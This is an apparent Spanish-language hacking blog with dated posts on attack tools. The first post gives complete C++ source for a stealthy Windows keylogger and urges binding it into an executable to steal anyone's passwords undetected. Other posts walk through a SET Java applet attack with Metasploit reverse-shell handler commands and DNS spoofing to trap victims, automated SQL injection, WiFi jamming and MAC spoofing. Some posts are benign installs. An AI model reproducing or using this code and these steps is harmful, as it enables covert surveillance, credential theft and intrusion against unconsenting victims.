martes, 19 de noviembre de 2013

Como siempre, la parte mas interesante de hackear es espiar. Hoy les voy a mostrar como crear un código en C++ para crear un Keylogger. Un keylogger es un tipo de software o un dispositivo hardware específico que se encarga de registrar las pulsaciones que se realizan en el teclado, para posteriormente memorizarlas en un fichero o enviarlas a través de Internet. Esto suele ser muy divertido ya que podremos averiguar las contraseñas y datos personales de cualquier persona que use el ordenador que este infectado con nuestro Keylogger. Esta aplicación se puede usar en cualquier sistema como en la escuela, trabajo, etc.

Ventajas de usar un Keylogger:

  • Es un método muy simple y fácil de llevar a cabo.
  • Es un ataque silencioso  ya que la victima no se dará cuenta que esta siendo hackeada.
Como crear un Keylogger usando C++:

  • Instrucciones:
1. Instalar Dev C++ y ejecutarlo.
2. Dirigirse a File->New->Source File
3. A continuación, pegar el siguiente código en el espacio de trabajo en blanco.

#include <iostream> 
using namespace std; 
#include <windows.h> 
#include <winuser.h> 
int Save (int key_stroke, char *file);
void Stealth();

int main() 
{
Stealth(); 
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt"); 
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]"); 
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n"); 
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB) 
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

4. Compilar el código, y para eso nos dirigimos a la ventana Execute y le damos a Compile (Ctrl+F9)


Cuando le den a Compile, verán algo como esto:



5. Cuando terminen, nos dirigimos a el directorio donde guardamos el programa ya compilado y veremos estos archivos, dentro de los cuales, estará el programa y un archivo de texto log.txt


6. Este archivo .txt es en donde se guardaran las teclas que se presionen mientras el programa se esta ejecutando. Lo único que nos queda es unir estos dos archivos en un .exe y mandarlo a quien queramos o ejecutarlo en el ordenador que queramos y todas sus contraseñas quedaran registradas!

¿Que es un Binder?

Un Binder es un software que se usa para combinar o esconder dos o mas archivos en un único archivo bajo el mismo nombre y extensión  Los archivos a combinar pueden tener cualquier nombre y extensión  solo depende de nosotros elegir el nombre y el icono del archivo combinado. Estos archivos combinados son mas peligrosos cuando están encriptados ya que pueden no ser detectados por un análisis de Antivirus





Los Mejores Binders:


  • Simple Binder:

  • Weekend Binder:



lunes, 18 de noviembre de 2013

jSQL es una herramienta que nos permite realizar ataques AUTOMATICOS de inyección SQL a paginas web vulnerables a este ataque y así obtener todos los datos del servidor, y con suerte, nos permitirá encontrar el usuario Admin con su respectiva contraseña.

Descarga:
http://code.google.com/p/jsql-injection/downloads/list




Métodos de inyección SQL disponibles en jSQL:

  • Metodos GET, POST, header, cookie.
  • normal, error based, blind, time based algorithms
  • Deteccion de Algoritmos automatica
  • Obtencion de datos automatica
  • Ajustes Proxy
  • Evasion
  • MySQL


domingo, 17 de noviembre de 2013

¿Que es Nmap ? Es una herramienta para administradores de sistemas y gente interesada en el escaneo de grandes o pequeñas redes para determinar los equipos que se encuentran activos y cuales son sus servicios.





Instruciones:


  1. Instalar Nmap ya sea en Windows o en Backtrack preferentemente ya que en Backtrack, Nmap viene ya instalado. En caso de que estés usando otra distribución de linux, solo ejecuta el comando: "apt-get install nmap"






  2. Ejecutar: nmap --script ip-geolocation-geobytes [ip que queremos escanear sin los corchetes]
  • Ejemplo: nmap --script ip-geolocation-geobytes 192.168.0.1
Luego de unos segundos, nos apareceran todos los datos de la IP con sus respectivas coordenadas. (Podemos localizarlas en un mapa con  Google Mapas)



sábado, 16 de noviembre de 2013

Las paginas que les voy a compartir a continuación  sirven para escanear cualquier pagina web que deseen en busca de vulnerabilidades a ataques SQL, el método mas empleado por todos los hackers del mundo. 

El primer paso para poder llevar a cabo este ataque es comprobar que la web que queremos atacar realmente sea vulnerable para ahorrarnos tiempo y muchos intentos en vano. Estas paginas son las mejores actualmente, son gratis, y muy fáciles de usar:
  • http://www.be007.gigfa.com/scanner/scanner.php
  • http://www.sunmagazin.com/tools/hack/SQLI-Scan
  • http://scanner.drie88.tk
  • http://wolfscps.com/gscanner.php
  • http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan

viernes, 15 de noviembre de 2013

i-FunBox es una utilidad que te permitirá gestionar tu iPhone desde el Escritorio de tu PC tal como si fuera una unidad más, una unidad de almacenamiento multimedia.

Su entorno está pensado para que puedas localizar esos elementos multimedia que sueles guardar en tu iPhone con facilidad. Mediante una serie de accesos directos, es posible explorar las carpetas donde se guardan los vídeos, las canciones, los fondos de pantalla, los tonos, las aplicaciones e incluso los archivos del sistema.

Transferir un archivo con i-FunBox es muy sencillo. Basta con conectar tu iPhone por USB, seleccionar el archivo que quieres transferir y arrastrarlo donde quieras. Así de simple. Sin configuraciones previas ni interminables sincronizaciones.







Descarga:












Utilidades:

  • Explorar el sistema de archivos SIN JAILBREAK!

  • Instalar Apps y Tweaks 

  • Permite usar tu dispositivo como dispositivo de almacenamiento USB

  • Conección por WiFi SSH







jueves, 14 de noviembre de 2013

Un Ataque de Denial of Service (Denegación de Servicios), es un ataque a un sistema de computadoras o red que como resultado provoca que un servicio o recurso sea inaccesible a los usuarios. Normalmente provoca la pérdida de la conexión de red por el consumo del ancho de banda de la red de la víctima. En este tutorial voy a mostrar como realizar este ataque a cualquier punto de acceso WiFi para que todos los usuarios que estén conectados se desconecte y para que nadie se pueda conectar nuevamente (durante el periodo de tiempo en el que el ataque este funcionando, no es permanente).


Requisitos:
  • Backtrack (Descarga)
  • No hace falta tener acceso a la red, solo necesitas que este a tu alcance.

Instrucciones:

  1. Una vez en Backtrack, tenemos que comprobar que tenemos instalado WebSploit. Para ello nos dirigimos a Applications >> BackTrack >> Exploitation Tools >> Web Explotation Tolls y aca debería encontrarse WebSploit, si en tu caso es asi, continua directamente en el paso 3. De lo contrario tendremos que instalarlo.
  2. Para instalar WebSploit, primero tendremos que descargarlo aquí. Una vez descargado extraemos el archivo en el directorio "/pentest/web/". Despues de extraerlo debemos hacer click derecho en el archivo websploit, seleccionamos "Properties" y en la ventana emergente nos dirigimos a la pestaña "Permissions" y seleccionamos la casilla "Allow executing file as program". Una vez hecho esto, solo nos queda ejecutar Websploit. Para ello, abrimos la consola/terminal de Backtrack y ejecutamos los siguientes comandos:
    • cd /pentest/web/websploit
    • ./websploit
  3. Luego de ejecutar Websploit, vamos a ejecutar los siguientes comandos:
    • use wifi/wifi_jammer
    • set essid [nombre essid del wifi]
    • set bssid [numero bssid del wifi]
    • set channel [your channel number]
    • RUN
NOTA: 
  • BSSID: Significa Basic Service Set Identifier y se trata de la dirección MAC (física) del Access Point al que nos conectamos. Lo podemos obtener mirando la tabla ARP si estamos conectados o mediante el comandoo "airodump-ng" para capturar el tráfico que genere.
  • ESSID: Significa Extended Service Set ID y es el nombre identificable de la red.
  • Para obtener el BSSID y el ESSID en Windows vamos a cmd y ejecutamos: netsh wlan show networks mode=bssid 


domingo, 10 de noviembre de 2013

¿Nunca quisiste tener Backtrack como tu Sistema Operativo Principal y aprovechar toda la potencia de tu ordenador?  Instala cualquier distribución de Backtrack en tu ordenador directamente en tu disco duro como tu sistema operativo principal (sin windows) en muy pocos pasos. Certificado por el equipo de Backtrack Oficial!

bACKTRACK


NOTA: Este método de instalación es el mas sencillo y mas rapido. Una vez instalado, ten en cuenta que el sistema Backtrack reemplazara por completo a Windows o a tu sistema operativo anterior. 

Requisitos:

  • Descargar el ISO de Backtrack original AQUÍ 
  • Disponer de alguna forma para bootear Backtrack en nuestro ordenador desde la BIOS. La opción mas fácil es desde un PenDrive USB, aquí te mostramos como hacerlo: Como Instalar Backtrack en Memoria USB
Instrucciones: 
  1. Booteamos Backtrack desde nuestro USB como explicamos en el tutorial mas arriba y una vez booteado, tipeamos "startx" (sin comillas) para acceder a la interfaz grafica.
  2. Una vez dentro de la interfaz grafica, nos dirigimos a escritorio y ejecutamos el archivo “install.sh”. Si no lo encontramos podemos abrir la consola y ejecutamos el comando: “ubiquity”.
  3. A continuación nos aparecerá una ventana similar a la de arriba. Aquí lo que debemos hacer es indicar nuestra ubicación geográfica y el layout de nuestro teclado.                         
  4. Ahora nos va a pedir que seleccionemos la partición donde vamos a instalar Backtrack pero como lo queremos instalar en todo el disco, le damos a "Use entire disk"
  5. Le damos a continuar y procedemos con l instalacion. Una vez terminada, el sistema se reiniciara y cuando vuelva a arrancar, nospedira un usuario y contraseña, y para ello utilizareemos: root como usuario y toor como contraseña:
  6. LISTO! Ahora ya tenemos Backtrack instalado completamente en nuestro ordenador.



jueves, 7 de marzo de 2013

Como todos sabemos, MetaSploit viene por defecto instalado en Backtrack, y como instalar solo MetaSploit era bastante complicado aquí les traigo un tutorial para instalar Backtrack 5 en Android


TUTORIAL AQUÍBacktrack 5 en Android Tutorial

miércoles, 6 de marzo de 2013

Java Applet Attack es uno de mis ataques preferidos. Es muy efectivo y discreto pero lo que mas me gusta de el es lo fácil que es llevarlo a cabo. Solo necesitas tener Backtrack y tener instalado solo 2 aplicaciones: SET y MetaSploit


Java applet Attack afecta:
  • Windows Systems
  • Linux Systems and
  • Mac OS X
Instrucciones:

1. Primero ejecutamos la aplicacion SET yendo a: Applications >> BackTrack >> Exploitation Tools >> Social Engineering Tools >> Social Engineering Toolkits >> SET                                      



    2. Una vez iniciado SET, elegimos la opción 2) Website Attack Vector. Para ello ponemos 2 y le damos a enter.
      3. Ahora nos aparecerá otro menú como el de la imagen de abajo en el que seleccionaremos la opción 1) Java Applet Attack Method (de la misma manera que el paso anterior reemplazando el 2 por el 1)     

                                                                                    
        4. A continuación aparecerá otro menú en el que seleccionaremos la opción 2) Site Cloner  

                                       


          5. Ahora tendremos que introducir la pagina que queremos clonar para que sea nuestra pagina infectada. Podemos introducir cualquiera por ejemplo: www.apk-hacks.blogspot.com     

            

          6. El siguiente paso consiste en elegir que Payload vamos a utilizar, en este caso vamos a seleccionar la siguiente:                                


          7. A continuacion vamos a tener que elegir que metodo de encripcion vamos a querer. Nosotros vamos a usar 16) Backdoor Executable (BEST)


          8. Lo siguiente va a ser elegir el puerto que queramos utilizar. (podemos darle directamente a enter para que SET elija el puerto)


          9. Una vez seleccionado el puerto, SET iniciara MetaSploit


          10. Una vez iniciado MetaSploit tendremos que ejecutar los siguientes comandos:

          • use exploit/multi/handler
          • set payload windows/meterpreter/reverse_tcp (para ataques a Windows)
          • set payload linux/x86/shell/reverse_tcp (para ataques a Linux)
          • set LHOST "nuestra ip local"
          • set LPORT "puerto que querramos utilizar"
          • set ExitOnSession false
          • exploit -j


          11. Ahora lo unico que nos queda es hacer que nuestra victima entre a nuestra pagina infectada, para eso podemos utilizar Ettercap para rediccionar cualquier pagina, por ejemplo: www.facebook.com , a nuestra pagina infectada que sera la indicada en la imagen superior. Para saber como hacerlo lee DNS Spoofing con Ettercap en Backtrack Tutorial

          12. Una vez que logramos que nuestra victima entre a nuestra pagina infectada, se le solicitará en una pequeña ventana que ejecute una aplicación de Java que requiere el sitio infectado, el cual la victima desconoce, por lo tanto el %99 de las personas la ejecutara. Cuando la victima le da a ejecutar, automáticamente se conecta a el ordenador del atacante proporcionándole control total de la victima.



          13. Asi se vera cuando la victima haya caído en nuestra trampa:



          14. Como vimos en la imagen anterior, se creo una sesion cuando recivimos la conexion de la victima. Lo que debemos hacer ahora para tomar el control de esa sesion es ejecutar el siguiente comando:
          • session -i 1



















          martes, 5 de marzo de 2013

          Macchanger es una aplicación muy util para cambiar nuestra dirección MAC de la placa de red. Esto se puede utilizar para muchas cosas pero la mas conocida y popular es para acceder a redes WiFi con filtro MAC.


          GNU / Linux:

          1. Lo primero que tenemos que hacer es descargar la aplicación macchanger. Para eso nos dirigimos a terminal y introducimos el siguiente comando:  apt-get install macchanger
          2. Una vez instalado, tenemos que averiguar nuestra interfaz de red, para ello ejecutamos el siguiente comando: airmon-ng
              3.   Aquí tendremos que buscar la interfaz que este en uso en nuestro ordenador, para ello nos fijamos cual de ellas tiene asociada nuestra ip local. En mi caso, como ven en la imagen de arriba, la mía es eth0 (si la tuya es diferente reemplaza eth0 por tu interfaz en los pasos que siguen)
             4.   Una vez obtenida nuestra interfaz de red, procederemos a cambiar nuestra dirección MAC. Para ello ejecutamos los siguientes comandos: (igual que en la imagen de arriba)
          • ifconfig eth0 down 
          • macchanger --mac 00:00:00:00:00:00 (introducir la MAC que queramos tener)
          • ifconfig eth0 up


             5.   Listo! Ahora, para comprobar que funciono ejecuta: ifconfig y comprueba el resultado

          Windows:

          1. Para cambiar nuestra dirección MAC en windows usaremos un programa llamado "Windows MAC Address Changer".
          2. Una vez descargado, lo instalamos y seguimos los pasos a continuación:
          3. Primero seleccionamos nuestra Interfaz de Red: 
          4. Le damos a "Change" y nos llevara al la siguiente pagina 
          5. Seleccione su sistema operativo (si su sistema operativo Windows no está en la lista a continuación, sólo tienes que seleccionar "Windows XP") 
          6. Ahora introducimos la dirección MAC que queramos tener y le damos a "Apply". Para que los cambios tengan efecto tenemos que reiniciar el equipo o desactivar y activar las Conecciones de Red


          lunes, 4 de marzo de 2013

          Aircrack es una aplicación de análisis de redes encalabrinamos WiFI(Escanear Puertos con Nmap Tutorial)
          Ettercap es una aplicación que convierte a nuestro ordenador como intermediario entre las peticiones de DNS y que realiza la víctima y el punto de acceso. (DNS Spoofing Tutorial).


          Requisitos:
          • iPhone, iPod, o iPad con Jailbreak
          • Mobile Terminal o iSHH
          • Cydia instalado
          Instrucciones:

          Aircrack:
          1. Primero que todo nos dirigimos a Cydia, Manage, Sources y le damos edit, luego a add, y introducimos la siguiente direccion: http://theworm.altervista.org/cydia/
          2. Una vez instalada la repo, vamos a search, buscamos Aircrack-ng y lo instalamos.


          Nmap:
          1. Para instalar Nmap simplemente lo buscamos en Cydia y lo instalamos. (viene en una repo instalada en Cydia por defecto)
          2. Si quieres aprender como utilizar Nmap y para que sirve visita Nmap Tutorial



          Ettercap:
          1. Si ya has instalado la repo que utilizamos arriba para instalar Aircrack simplemente búscalo en cydia e instalado. Si este no es tu caso, repite el paso 1. de la instalación de Aircrack.
          2. Si quieres aprender como utilizar Ettercap y para que sirve visita DNS Spoofing con Ettercap Tutorial


          domingo, 3 de marzo de 2013

          A continuación les voy a explicar como instalar una distribución GNU / Linux, en este caso Ubuntu en un dispositivo Android.
          Requisitos:
          • Android 2.1 o superior.
          • Procesador de 1Ghz (como mínimo), 
          • Acceso Root
          • Busybox instalado. Si no lo tienes puedes descargar un instalador.
          • Kernel compatible con loop device support,
          • 2,5 y 3,5 Gb de espacio de almacenamiento.
          • Ubuntu installer.

            Instrucciones:

            1.1. Ejecutaremos la aplicación Ubuntu Installer.
            cómo instalar ubuntu en tu dispositivo android 1 Cómo instalar Ubuntu en tu dispositivo Android
            1.2. Ahora le samos a Install Guide y seleccionaremos la versión de Ubuntu que queremos instalar:

            cómo instalar ubuntu en tu dispositivo android 2 Cómo instalar Ubuntu en tu dispositivo Android

            cómo instalar ubuntu en tu dispositivo android 3 Cómo instalar Ubuntu en tu dispositivo Android
            1.3. Next:

            cómo instalar ubuntu en tu dispositivo android 4 Cómo instalar Ubuntu en tu dispositivo Android

            1.4. Ahora le damos a Download Boot Script y esperamos a que se descargue. A continuación le damos a Download Full Ubuntu Image y esperamos a que se complete la descarga. El ultimo es la imagen completa de Ubuntu, por lo tanto va a tardar unos minutos.




            1.5. Una vez descargados los archivos anteriores le damos a Download/install VNCviewer App y a Download/install Terminal App.




            1.6.Cuando ya estén descargados e instalados ambos programas cerramos Ubuntu Installer.
            2. A continuación, lo que necesitamos hacer ahora es ir a la carpeta de descargas de nuestra sdcard y buscar los primeros dos archivos que descargamos anteriormente. Una vez localizados, los descomprimimos en la raíz de la sdcard. Este paso puede hacerse desde nuestro dispositivo con algún administrador de archivos o directamente desde nuestro ordenador.
            3. Abrimos Terminal Emulator y ejecutamos los siguientes comandos
            • cd sdcard (nos dirijimos a la raiz de la sdcard)
            • su (obtenemos permisos de superusuario)
            • ls (listamos el contenido de la sdcard)
            4. Después de ejecutar el comando "ls" veremos los archivos que descomprimimos en la lista como en la imagen a continuación. (el nombre del archivo con la extensión .sh puede variar, si el tuyo es diferente reemplaza el nombre de archivo ubuntuv6.sh por el tuyo en los comandos del siguiente paso)


            5.  Ejecutamos el comando:
            • sh ubuntuv6.sh
            6.  A continuación nos pedirá que introduzcamos la resolución de la pantalla de nuestro dispositivo. Ejemplo: 1024×600. Si es que nos pregunta de vuelta que seleccionemos entre 2 opciones, seleccionamos la primera.

            7. Minimizamos Terminal Emulator y lo dejamos corriendo en segundo plano.  (para eso le damos al boton Home)

            8.  Ahora configuramos VNCviewer como en la imagen a continuacion. La contraseña es ubuntu.




            9. Para Finalizar le damos a Connect, y como resultado tendremos Ubuntu iniciándose en nuestro terminal Android después de tan solo 9 sencillos pasos.




            Ubuntu en tu ordenador desde tu dispositivo:




            Lo único que necesitamos para poder correr el Ubuntu que tenemos instalado en nuestro terminal Android en nuestro Ordenador, es instalar un cliente VNC como por ejemplo RealVNC y conectarnos de la misma manera y con mismos datos que utilizamos con VNCviewer en nuestro dispositivo.
            Como resultado tendremos Ubuntu móvil instalado en nuestro dispositivo con la posibilidad de correrlo en cualquier ordenador!



            • Cualquier duda o problema comenta!